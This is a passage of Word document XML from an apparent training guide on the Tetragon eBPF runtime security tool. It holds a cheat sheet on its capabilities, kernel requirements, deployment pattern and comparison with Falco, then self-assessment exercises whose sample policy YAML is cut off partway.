        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.8 Operational Reality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">True zero-trust runtime is HARD. It requires:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deep knowledge of what each workload actually needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tolerance for breaking legitimate uncommon operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuous policy tuning as workloads evolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buy-in from application teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mature operational processes around emergency response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most organizations don't achieve full zero-trust. They achieve PARTIAL zero-trust — key paths protected, broader hardening over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is a TOOL that enables zero-trust. Whether you achieve it depends on organizational commitment.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16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Quick-Reference Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.1 What Tetragon Is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eBPF-based security observability AND runtime enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part of Cilium family; CNCF Incubating.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kubernetes-native (TracingPolicy CRDs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kernel-level blocking via BPF LSM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deep process lineage tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.2 Key Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process lineage (parent, grandparent, all ancestors).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File access (reads, writes, permission changes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network events (connect, bind, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capability changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Namespace operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real-time policy enforcement (block, kill, override).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.3 Action Vocabulary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post — emit event (default, safe).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Override — fail the syscall with specified errno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Signal — send signal to process (often SIGKILL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NoPost — suppress event emission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.4 Key Hook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Hook</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Stable?</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Enforcement?</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Tracepoint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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Kprobe</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Kernel-version-dependent</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Via override</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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BPF LSM</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YES (full enforcement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.5 Kernel Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MINIMUM: Kernel 5.7+ for enforcement (BPF LSM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RECOMMENDED: 5.10+ for stable feature set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VERIFY: cat /sys/kernel/security/lsm — "bpf" must be listed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OLDER KERNELS: observability works; enforcement limited or unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.6 Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tetragon agent — DaemonSet, per node.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tetra CLI — operator interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TracingPolicy CRDs — rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TracingPolicyNamespaced CRDs — namespace-scoped rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.7 Deployment Pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy Tetragon in observability mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write custom policies for your workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe events; verify policies match as expected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tune selectors to eliminate false positives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Convert high-confidence policies to enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor; iterate; document kill-switch procedure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.8 Tetragon vs Falco One-Liner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Falco = mature detection with massive integration ecosystem. Tetragon = detection + enforcement, Kubernetes-native, modern kernel required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.9 When to Choose Tetragon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Need enforcement (not just detection).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Already running Cilium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zero-trust runtime mandate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kubernetes-native policy preferred.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern kernels available (5.7+).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">16.10 When NOT to Choose Tetragon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection-only is sufficient (Falco simpler).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Older kernels (4.x) without BPF LSM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Need maximum downstream integration breadth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Team prefers CNCF Graduated stability level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Existing deep Falco investment.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Part 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Self-Assessment Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.1 Exercise 1 — Detection vs. Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each scenario, argue whether DETECTION (Falco) or ENFORCEMENT (Tetragon) is the better fit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A large organization's SOC team monitors hundreds of production clusters. They want a reliable detection tool that feeds their SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fintech company stores customer PII in /data/customers/. The read of this data by any unauthorized process must be PREVENTED, not just detected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A small engineering team adopting runtime security for the first time. They want to understand what's running in their cluster before making changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A cluster running mission-critical workloads where enforcement mistakes could cause outages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A cluster pursuing zero-trust architecture where every security-relevant action should be verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FALCO. Detection-focused, mature SIEM integrations, reliable. No need for enforcement complexity; Falco's strengths align perfectly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TETRAGON. The scenario explicitly demands prevention. Tetragon's Override action on file opens provides exactly this. Falco would merely report after the fact — insufficient for fintech PII.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FALCO initially. Lower commitment, faster time-to-value, observe-first model. Can add Tetragon later if enforcement becomes needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FALCO, likely. Enforcement risk is too high for mission-critical workloads unless security engineers have time to extensively tune Tetragon policies. Detection + human response might be safer initially. If Tetragon is used, strict observability-first rollout with long test periods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TETRAGON. Zero-trust specifically requires verification (and ideally prevention) of every action. Tetragon's enforcement model fits. Likely combined with Falco for broader detection coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.2 Exercise 2 — Write a Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write a TracingPolicy that: (a) runs only in namespace 'payments', (b) detects when any process OTHER than /app/payment-service executes in a pod, (c) emits an event in observability mode (no action taken). Then describe how you'd convert it to enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">apiVersion: cilium.io/v1alpha1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kind: TracingPolicyNamespaced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">metadata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  name: payments-exec-allowlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  namespace: payments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">spec:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  kprobes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
